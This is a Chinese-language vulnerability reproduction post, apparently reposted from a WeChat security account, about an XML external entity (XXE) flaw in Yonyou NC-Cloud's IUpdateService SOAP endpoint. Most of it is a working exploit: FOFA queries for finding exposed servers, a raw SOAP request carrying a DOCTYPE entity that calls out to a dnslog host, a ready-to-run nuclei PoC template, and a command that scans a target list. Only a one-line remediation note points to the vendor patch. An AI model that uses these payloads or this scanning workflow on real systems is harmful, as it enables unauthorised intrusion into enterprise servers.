01
—
漏洞名称
02
—
漏洞影响
用友NC-Cloud
03
—
漏洞描述
用友NC-Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现人、财、物、客的 全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。该系统/uapws/service/nc.uap.oba.update.IUpdateService接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器被远控。
04
—
body=
"/Client/Uclient/UClient.exe"
||
body=
"ufida.ico"
||
body=
"nccloud"
||
body=
"/api/uclient/public/"
05
—
漏洞复现
注册一个dnslog平台,如http://dnslog.pw/dns/?&monitor=true,向靶场发送如下数据包,访问dns
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host
: 192.168.40.130:8989
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length
: 421
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding
: gzip, deflate
Accept-Language
: zh-CN,zh;q=0.9
Connection
: close
Content-Type
: text/xml;charset=UTF-8
SOAPAction
: urn:getResult
Upgrade-Insecure-Requests
: 1
<
soapenv:Envelope
xmlns:soapenv
=
"http://schemas.xmlsoap.org/soap/envelope/"
xmlns:iup
=
"http://update.oba.uap.nc/IUpdateService"
>
<
soapenv:Header
/>
<
soapenv:Body
>
<
iup:getResult
>
<!--type: string-->
<
iup:string
>
<![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]>
</
iup:string
>
</
iup:getResult
>
</
soapenv:Body
>
</
soapenv:Envelope
>
在DNSlog平台能看到访问记录
漏洞复现成功
06
—
nuclei poc
poc文件内容如下
id
: yonyou-nc-cloud-IUpdateService-xxe
info:
name: 用友NC-Cloud soapFormat XXE漏洞
author: fgz
severity: critical
description: 用友NC-Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现人、财、物、客的 全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。该系统/uapws/service/nc.uap.oba.update.IUpdateService接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器被远控。
metadata:
max-request: 1
fofa-query: body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
verified: true
requests:
- raw:
- |-
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction: urn:getResult
Content-Type: text/xml;charset=UTF-8
Content-Length: 397
<
soapenv:Envelope
xmlns:soapenv
=
"http://schemas.xmlsoap.org/soap/envelope/"
xmlns:iup
=
"http://update.oba.uap.nc/IUpdateService"
>
<
soapenv:Header
/>
<
soapenv:Body
>
<
iup:getResult
>
<!--type: string-->
<
iup:string
>
<![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://{{interactsh-url}}">%aaa;%ccc;%ddd;]>
<xxx/>]]>
</
iup:string
>
</
iup:getResult
>
</
soapenv:Body
>
</
soapenv:Envelope
>
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, "dns")
condition: and
运行POC
.nuclei.exe -t mypoc/用友/nc-cloud/yonyou-nc-cloud-IUpdateService-xxe.yaml -l
data
/用友-NC-Cloud2.txt
07
—
修复建议
用友安全中心已经发布补丁,请及时修复。
https:
/
/security.yonyou.com/
#/home
原文始发于微信公众号(AI与网安):【漏洞复现】用友NC-Cloud IUpdateService xml外部实体注入漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论